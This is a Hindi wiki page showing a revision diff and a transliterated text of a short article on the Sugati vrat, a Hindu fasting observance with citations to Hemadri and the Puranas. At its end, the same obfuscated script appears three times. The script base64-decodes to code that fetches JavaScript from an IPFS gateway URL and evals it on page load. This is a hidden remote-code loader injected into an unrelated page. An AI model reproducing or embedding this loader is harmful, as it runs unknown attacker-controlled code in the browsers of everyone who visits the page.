Difference between revisions of "सुगति व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (सुगतिव्रत का नाम बदलकर सुगति व्रत कर दिया गया है)
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
*इस व्रत में देवों के स्वामी की पूजा से सर्वोत्तम स्थिति की प्राप्ति होती है।<ref> हेमाद्रि (व्रतखण्ड 1, 792, विष्णुधर्मोत्तरपुराण से उद्धरण)</ref>  
+
*इस व्रत में देवों के स्वामी की पूजा से सर्वोत्तम स्थिति की प्राप्ति होती है।<ref>हेमाद्रि (व्रतखण्ड 1, 792, विष्णुधर्मोत्तरपुराण से उद्धरण)</ref>  
 
*एक वर्ष तक सी [[अष्टमी|अष्टमियों]] पर नक्तविधि से भोजन करना चाहिए।
 
*एक वर्ष तक सी [[अष्टमी|अष्टमियों]] पर नक्तविधि से भोजन करना चाहिए।
 
*अन्त में गोदान करना चाहिए।
 
*अन्त में गोदान करना चाहिए।
 
*[[इन्द्र]] की स्थिति की प्राप्ति होती है।  
 
*[[इन्द्र]] की स्थिति की प्राप्ति होती है।  
*हेमादि, [[मत्स्यपुराण]], अहल्याकामधेनु<ref> (हेमादि व्रतखण्ड 1, 881, [[पद्मपुराण]] से उद्धरण); (मत्स्यपुराण 101|6); अहल्याकामधेनु (पाण्डुलिपि 561 बी)</ref> ने इसे सुगत्यष्टमी कहा है।
+
*हेमाद्रि, [[मत्स्यपुराण]], अहल्याकामधेनु<ref>(हेमादि व्रतखण्ड 1, 881, [[पद्म पुराण]] से उद्धरण); (मत्स्य पुराण 101|6); अहल्याकामधेनु (पाण्डुलिपि 561 बी)</ref> ने इसे सुगत्यष्टमी कहा है।
  
 
{{लेख प्रगति
 
{{लेख प्रगति

Revision as of 10:20, 18 September 2010

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullakhit hindoo dharm ka ek vrat sanskar hai.
  • is vrat mean devoan ke svami ki pooja se sarvottam sthiti ki prapti hoti hai.[1]
  • ek varsh tak si ashtamiyoan par naktavidhi se bhojan karana chahie.
  • ant mean godan karana chahie.
  • indr ki sthiti ki prapti hoti hai.
  • hemadri, matsyapuran, ahalyakamadhenu[2] ne ise sugatyashtami kaha hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. hemadri (vratakhand 1, 792, vishnudharmottarapuran se uddharan)
  2. (hemadi vratakhand 1, 881, padm puran se uddharan); (matsy puran 101|6); ahalyakamadhenu (pandulipi 561 bi)

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>